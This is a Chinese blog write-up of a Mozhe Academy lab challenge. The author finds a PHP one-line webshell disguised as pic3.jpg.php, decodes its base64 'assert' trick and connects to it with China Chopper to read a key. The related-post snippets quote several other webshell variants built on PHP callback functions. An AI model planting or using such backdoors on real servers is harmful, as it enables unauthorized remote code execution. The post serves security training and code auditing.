墨者学院WebShell代码分析溯源(第6题)

最新推荐文章于 2019-09-04 22:33:13 发布
最新推荐文章于 2019-09-04 22:33:13 发布
阅读量9.5k 收藏 3
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42751456/article/details/88996802
版权

墨者学院WebShell代码分析溯源(第6题)

  1. 进入环境:
    实验环境
  2. 下载并分析源码:

在这里插入图片描述在如上路径中发现pic3.jpg.php,打开如下所示:

在这里插入图片描述图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释:

在这里插入图片描述所以eval函数是无法使用的,这里就要用到assert函数:
在这里插入图片描述我们比较一下eval和assert:
在这里插入图片描述

所以我们使用assert函数,但是前面有base64decode,因此我们需要让e等于assert进行base64编码后的值,即 YXNzZXJ0

  1. 使用中国菜刀连接

构造url如下:http://219.153.49.228:42640/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0,密码为POST,菜刀连接:
在这里插入图片描述连接上去之后如下:
在这里插入图片描述那个key开头的php文件引人注目,打开:
在这里插入图片描述输入,key,完成:
在这里插入图片描述关注公众号获得更多文章!
在这里插入图片描述
如需转载,请注明原文出处,作者:vergilben

vergilben
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 818
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     <?php error_reporting(0); call...
360众测靶场库之35-WebShell代码分析溯源(第6)
zjl12344的博客
03-08 183
360众测靶场
墨者学院 - WebShell代码分析溯源(第6)
多崎巡礼的博客
08-03 436
审查代码,在图片文件夹中有php(有毒) 使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析, 类似于第五,用e来接受assert的base64加密的值作为函数,用POST作为密码 使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...
墨者学院-WebShell代码分析溯源(第6)
JimWu的博客
09-04 211
WebShell代码分析溯源(第6) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、记事本 1.访问网页,下载网页源代码。 2.查看每个文件夹的源代码,发现在/Assets/upload中有可疑文件,php文件想冒充jpg。 3.打开文件,发现果然是一句话木马。 分析代码,了解到array_map属于回调函数。 base64_decode(e)为函数,e)为函数,...
墨者 - WebShell代码分析溯源(第6)
吃肉唐僧的博客
07-13 223
下载文件,又是一番探索木马文件 发现如下代码 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array($_POST['POST'],); array_map(base64_decode($e), $arr); ?> 这个也是一句木马的变种,获取url的e参数值(需要经过base64编码),链接密码是POST ...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者安全专家第二代 彻底免疫未知病毒
11-02
【基本介绍】 墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势...6、墨者安防问答 在线提出您的系统安全,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院 - WebShell代码分析溯源(第10)
多崎巡礼的博客
08-05 502
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。   &lt;?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...
墨者学院 - WebShell代码分析溯源(第9)
多崎巡礼的博客
08-05 815
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。     &lt;?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 767
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 688
代码审查 在random_int.php 前排 发现以下回调后门 &lt;?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 &lt;?php $e = $_REQUEST['...
墨者学院-WebShell代码分析溯源(第11)
JimWu的博客
09-04 241
WebShell代码分析溯源(第11) 难易程度:★★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载备份文件。 2.解压文件,分析代码。 3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。 我们继续分析一下代码,能看出代码中运用了str_replace函数。 该函数会把以其他字符替换字符串中的一些字符,在代码中就是把i...
墨者学院-WebShell代码分析溯源(第4)
JimWu的博客
09-04 340
WebShell代码分析溯源(第4) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.发现hack文件夹里有可疑文件bin.php 3.打开发现确实是一句话木马 能发现代码运用了回调函数,只有我们在菜刀连接时e输入的参数等于assert的密文,才能构成一句话木马病毒。 我们通过base64把assert,密文为YXNzZX...
墨者学院-WebShell代码分析溯源(第5)
JimWu的博客
09-04 346
WebShell代码分析溯源(第5) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件后发现了一个疑似木马的文件Exception.php。 3.打开文件,分析代码,有点像一句话木马。 分析后,发现call_user_func属于回调函数,第一个参数为函数,第二个参数作为回...
墨者学院-WebShell代码分析溯源(第9)
JimWu的博客
09-04 189
WebShell代码分析溯源(第9) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.根据最后的修改时间,确定可疑的文件。 3.打开文件,发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的,所以当e=assert时,把$_REQUES...
墨者学院-WebShell代码分析溯源(第3)
JimWu的博客
09-04 387
WebShell代码分析溯源(第3) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.审查后,能发现js文件夹里有个与众不同的文件,就是jquery1.42.min.php。 3.打开该文件,发现果然是变种一句话木马。 $g[1]=s chr('116')调用ASCII表,查找该表,知道116对应的是t 所以拼接起来就是$g...
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值